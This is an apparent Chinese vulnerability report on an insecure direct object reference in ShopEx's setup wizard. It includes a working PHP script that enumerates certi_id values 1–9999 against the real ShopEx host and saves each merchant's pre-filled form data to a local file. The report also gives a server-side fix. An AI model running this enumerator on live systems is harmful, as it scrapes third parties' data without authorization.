|
简要描述:
ShopEx某接口缺陷,可遍历所有网站
详细说明:
问题出现在shopex 网店使用向导页面
http://guide.ecos.shopex.cn/step ... WlkaWFuLmNvbVwvIn0=
refer base64解密为 {"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"}
我们修改certi_id 即可遍历所有使用了ShopEx程序的网站
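<?php
// Proof-of-concept driver from the report: request the ShopEx setup-wizard
// page once per certi_id in 1..9999. According to the report the server
// honours whatever certi_id the client supplies in the base64 `refer`
// parameter without checking ownership, so each request can return another
// merchant's wizard data — an insecure direct object reference (IDOR).
for ($i = 1; $i < 10000; $i++) { // enumerate ids
    ShowshopExD($i);
}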
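/**
 * Fetch the ShopEx setup-wizard step for one certi_id and dump the text-input
 * fields the returned page pre-fills.
 *
 * The `refer` query parameter is base64-encoded JSON of the form
 * {"certi_id":N,"callback_url":"..."}. base64 is an encoding, not a signature:
 * nothing prevents a client from changing certi_id, and (per the report) the
 * page serves whatever id it is given. The defensive fix belongs on the
 * server — tie certi_id to the authenticated session/merchant, or sign the
 * refer blob (e.g. an HMAC) and reject values that fail verification.
 *
 * @param int $cid certi_id to request; passed through intval() before use.
 * @return void Side effects only: echoes name:value pairs and appends them to
 *              c:/shopEx.txt when the response contains the refer value.
 */
function ShowshopExD($cid) {
    $url = 'http://guide.ecos.shopex.cn/step2.php';

    // Same structure as the legitimate refer shown decoded in the report.
    $refer = base64_encode('{"certi_id":'.intval($cid).',"callback_url":"http:\/\/www.a.com\/"}');

    $url = $url.'?refer='.$refer;

    $ch = curl_init($url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);

    $result = curl_exec($ch);
    // Converted from UTF-8 to GB2312 so the output reads on a Chinese console.
    $result = mb_convert_encoding($result, "gb2312", "UTF-8");

    // The response echoing the refer value back is used as the "hit" signal —
    // presumably the page only does so when the id resolved to a record.
    if (strpos($result, $refer))
    {
        $fp = fopen("c:/shopEx.txt", 'ab'); // save file

        // Record the name and value of every pre-filled text input.
        preg_match_all('/<input\stype="text"(.*?)\/>/', $result, $value);
        foreach ($value[1] as $key) {
            preg_match_all('/name="(.*?)"(.*?)value="(.*?)"/', trim($key), $res);
            echo $res[1][0].':'.$res[3][0]."\r\n";

            $col = $res[1][0].':'.$res[3][0]."\r\n";
            fwrite($fp, $col, strlen($col));
        }

        echo '--------------------------------'."\r\n";
        fclose($fp);
    }
    flush();

    curl_close($ch);
}
?>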
漏洞证明:
http://www.myhack58.com/Article/UploadPic/2013-9/201392110502740490.jpg
refer换成其他加密方式（注：base64 只是编码而非加密，仅更换编码或加密方式仍无法阻止遍历；根本修复应在服务端校验 certi_id 是否属于当前会话/商户，并对 refer 做签名校验以拒绝被篡改的值。）
|
|